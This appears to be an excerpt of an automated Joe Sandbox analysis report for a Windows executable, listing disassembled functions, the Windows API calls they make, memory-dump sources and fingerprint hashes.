                                                                                                                        • Instruction ID: bac083a056765273df7fdac93c4663c145e274c18b3b1b365ac2d59a247ad70b
                                                                                                                        • Opcode Fuzzy Hash: 184652ea66a00c646f0d6e367f8fa0d47b8fb75159f9cd0cc9461bb9675fa9ff
                                                                                                                        • Instruction Fuzzy Hash: D8C1E66292E68681E762AB159C6C2BFA754FB88F80FD74131D94E033B5CE7CE8458720

Control-flow Graph

[Control-flow graph of the function at 00007FF7A674C430 (basic blocks through 00007FF7A674C735); the rendered node and edge listing and its Executed / Not Executed legend are not reproduced. The graph shows calls to GetConsoleMode, WriteFile and GetLastError, the pattern of the C runtime's console-aware write path.]
                                                                                                                        APIs
                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7A674C41B), ref: 00007FF7A674C54C
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7A674C41B), ref: 00007FF7A674C5D7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 953036326-0
                                                                                                                        • Opcode ID: f410d9e07cb2d854853af875ff306a0e9c9ee922f70c4cde11a48ef332fbc2ec
                                                                                                                        • Instruction ID: d88a24b7130c49eaae2b98c538a0db14fbce4457b4319cf63bf98770e34f3cb8
                                                                                                                        • Opcode Fuzzy Hash: f410d9e07cb2d854853af875ff306a0e9c9ee922f70c4cde11a48ef332fbc2ec
                                                                                                                        • Instruction Fuzzy Hash: 03911862F2A65185F750EF658C6C2BEABA0FB08F88F965135DE0E536A4DF38D441C720

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4170891091-0
                                                                                                                        • Opcode ID: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
                                                                                                                        • Instruction ID: 923bd8fe98d753799b23f9d3ea3aa166a19e444a3991fbd441e3c59eb32ff929
                                                                                                                        • Opcode Fuzzy Hash: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
                                                                                                                        • Instruction Fuzzy Hash: 00514B72F262114AFB14EF249C6D6BDB7A1BF08B68FD64235ED1D426F4DB38A4418710

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1452418845-0
                                                                                                                        • Opcode ID: 90a7fcc3a81af5bf04ad81541e301d7d9fb9f11ea0fdd18d74326f9016f6428e
                                                                                                                        • Instruction ID: cbf9ac28205897491a48cf0797f7186304a3dadf173bcda434de21a7070d6882
                                                                                                                        • Opcode Fuzzy Hash: 90a7fcc3a81af5bf04ad81541e301d7d9fb9f11ea0fdd18d74326f9016f6428e
                                                                                                                        • Instruction Fuzzy Hash: DA318D91E2B10785FA59BB649D353BBA2819FADF84FC70134D91D4B2F3DE2DA4048271
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279662727-0
                                                                                                                        • Opcode ID: 1c8fa0e9f1f268703cdfbf571ccde9a0ae4dbb37f3b5d3b3dc57de33b3aee677
                                                                                                                        • Instruction ID: 462214b5f3bc14dab9dd8a9c1b1d0b62c779b5866c5aebade01c9abd272726c6
                                                                                                                        • Opcode Fuzzy Hash: 1c8fa0e9f1f268703cdfbf571ccde9a0ae4dbb37f3b5d3b3dc57de33b3aee677
                                                                                                                        • Instruction Fuzzy Hash: 9541FB22D2D79143E714AB20D92837AB360FF99B64F518334E65D03AE9DF7CA0E18710
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1703294689-0
                                                                                                                        • Opcode ID: d426427e4f48dbbb9dc5f253e5f2c69f0b75b8518679dacd75070a6bbb583433
                                                                                                                        • Instruction ID: a5cc27f29a1e1b627cdf13815e77603b08e51e1196ecaeb1c2738fe3e258de00
                                                                                                                        • Opcode Fuzzy Hash: d426427e4f48dbbb9dc5f253e5f2c69f0b75b8518679dacd75070a6bbb583433
                                                                                                                        • Instruction Fuzzy Hash: C0D09E10F3A70643EA143B705C7D17B9625AF5CF41F92147CD81B463BBDD2CE4494220
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: bd665411d6c8cb657e02e9163d495b47fe1eb31481a6a537198dee777c004d3e
                                                                                                                        • Instruction ID: a95bad97387377831222f9ab27914d589098530015a5e3dd8df4c6873768cf6f
                                                                                                                        • Opcode Fuzzy Hash: bd665411d6c8cb657e02e9163d495b47fe1eb31481a6a537198dee777c004d3e
                                                                                                                        • Instruction Fuzzy Hash: CD51FA62B2BA4245EA2CBE259D24677E280AF48FE4F968630DD6D437E5CF3CD4418721
                                                                                                                        APIs
                                                                                                                        • SetFilePointerEx.KERNELBASE(?,?,?,?,00000000,00007FF7A674B79D), ref: 00007FF7A674B650
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7A674B79D), ref: 00007FF7A674B65A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
• Instruction ID: 5e2aa180d2e14b28b8f1b998ac3188eda42ed35cc66d1b68319dc65bcfb29604
• Opcode Fuzzy Hash: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
• Instruction Fuzzy Hash: 5B11BFA2A29B9181DA10AB25A82816AA361FB49FF4F954331EA7D077E9DF3CD4118700
APIs
• FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A6746801), ref: 00007FF7A67469A7
• SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A6746801), ref: 00007FF7A67469BD
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: Time$System$FileLocalSpecific
• String ID:
• API String ID: 1707611234-0
• Opcode ID: 830c94081867150c960b6d723a3faffd283ff7679e667b9fb6d49bf0e5e2b665
• Instruction ID: dbf5e618777c0dad93b2ced3219a036b44890c1cb88abb57694370a2fc8e7930
• Opcode Fuzzy Hash: 830c94081867150c960b6d723a3faffd283ff7679e667b9fb6d49bf0e5e2b665
• Instruction Fuzzy Hash: DA01C22162D65182D754AF11A82923BF7A0FB88B21FA10336E6AD015E8DF7DD004CB20
APIs
• RtlFreeHeap.NTDLL(?,?,?,00007FF7A6751E42,?,?,?,00007FF7A6751E7F,?,?,00000000,00007FF7A6752345,?,?,?,00007FF7A6752277), ref: 00007FF7A6749E2E
• GetLastError.KERNEL32(?,?,?,00007FF7A6751E42,?,?,?,00007FF7A6751E7F,?,?,00000000,00007FF7A6752345,?,?,?,00007FF7A6752277), ref: 00007FF7A6749E38
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 875bb2537aa3df01b4a1e34b7b101e94a2dc47b4cb64fa0c1180c15e07a79d81
• Instruction ID: eb53820d4edb275c8def168eb69b35e30fb83c7824e68b21bf3db12b157b4837
• Opcode Fuzzy Hash: 875bb2537aa3df01b4a1e34b7b101e94a2dc47b4cb64fa0c1180c15e07a79d81
• Instruction Fuzzy Hash: 07E04F51E3A20242FE14BBF19CAD1379350AF4CF40FC68034C90E422B5DE2C68458270
APIs
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: DeleteErrorFileLast
• String ID:
• API String ID: 2018770650-0
• Opcode ID: 677f2ceb8ee0d5d75214142403d5559098fe9c7e5a50d88e5e1a5187c850d191
• Instruction ID: 9710e94d4f1b895876ce7e0cbedb4abeccf8af6948f3e2ddd8acd152f90b99a2
• Opcode Fuzzy Hash: 677f2ceb8ee0d5d75214142403d5559098fe9c7e5a50d88e5e1a5187c850d191
• Instruction Fuzzy Hash: ABD0C914E3B50285E61437B10C6E63BA290AF5DF20FD20674C45A801F5FE1CA0895531
APIs
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: DirectoryErrorLastRemove
• String ID:
• API String ID: 377330604-0
• Opcode ID: 45670ffc5494559b4402bb32e1ee61b2bed3bec50e0362f78a5b89dc8e7724e5
• Instruction ID: a2cca1898d7722d4e0cfac87a23b619a0117f03bab88e3f566c2c45c1f1ae56f
• Opcode Fuzzy Hash: 45670ffc5494559b4402bb32e1ee61b2bed3bec50e0362f78a5b89dc8e7724e5
• Instruction Fuzzy Hash: 67D0C910E3F50281E65537710C6D23BA290AF4CF20FD20670C01A811F5EE2CA0555131
APIs
• CloseHandle.KERNELBASE(?,?,?,00007FF7A6749EA5,?,?,00000000,00007FF7A6749F5A), ref: 00007FF7A674A096
• GetLastError.KERNEL32(?,?,?,00007FF7A6749EA5,?,?,00000000,00007FF7A6749F5A), ref: 00007FF7A674A0A0
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
• Instruction ID: 9bc0c498c32a6427d3b40e356f08d59e9fcf9af9f34ac08e9cf70663bb2fcee5
• Opcode Fuzzy Hash: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
• Instruction Fuzzy Hash: C621C211B3A64241EA5477259CBC27B9291EF4CF90FC64235D92E477F9DE6CE4858320
APIs
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: ByteCharMultiWide_findclose
• String ID:
• API String ID: 2772937645-0
• Opcode ID: 2eb70a2f0075b5df4e32ad510079c3b3b3dc7bfa02a9b4199a1254bfbddd7d17
• Instruction ID: fd203ac6e8be15973acd23b3d99ae8d50ad9bc2ec60da802245ea04b75a37396
• Opcode Fuzzy Hash: 2eb70a2f0075b5df4e32ad510079c3b3b3dc7bfa02a9b4199a1254bfbddd7d17
• Instruction Fuzzy Hash: AE71A652E29BC581E611DB2CD9152FDB360F7A9B4CF95E321DB9C12562EF28E2D9C300
APIs
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 7edcb5c19051daea02f21c4053ec30bf8603933813fd22e9cae156a3527bc5bd
• Instruction ID: 1afc737b8cc62ae4ae46c8c4aa73aeb38650c2d5dc02f9e54bdbbfc1cc66c124
• Opcode Fuzzy Hash: 7edcb5c19051daea02f21c4053ec30bf8603933813fd22e9cae156a3527bc5bd
• Instruction Fuzzy Hash: 8841ED7292A20187EA35EB69DD6C27AF360EB5DF84F510131D68E436E1CF2CE802C761
APIs
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
• Opcode ID: 56f3d48c04ccbebb436612cf95c0dfde4dbfee2bb1faed7625d682a393ffeaff
• Instruction ID: dfeee2c8d54d1eba47cab2146c17df1b803b8996ca1d434155a07e3fbf3137ea
• Opcode Fuzzy Hash: 56f3d48c04ccbebb436612cf95c0dfde4dbfee2bb1faed7625d682a393ffeaff
• Instruction Fuzzy Hash: CC21B621B2A69145EA1ABA226D247BBE651BF4DFC4FCA4430EE0D07796CE3DE141C214
APIs
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 36b0fbc90b3b462680d3b6a13c035726274d9c74de2b43bcb58660ea55cb43b3
• Instruction ID: e0692a84108634dcd7504476da9671f8aca42737bf7ec07a9048cd43bd9259e2
• Opcode Fuzzy Hash: 36b0fbc90b3b462680d3b6a13c035726274d9c74de2b43bcb58660ea55cb43b3
• Instruction Fuzzy Hash: 17316121A3A66285E751BB158C6E27AA750EB48F95F820135DA2D033F6DF7CE4818721
APIs
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3947729631-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: DirectoryErrorLastRemove
• String ID:
• API String ID: 377330604-0
APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF7A674A8B6,?,?,?,00007FF7A6749A73,?,?,00000000,00007FF7A6749D0E), ref: 00007FF7A674DD95
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
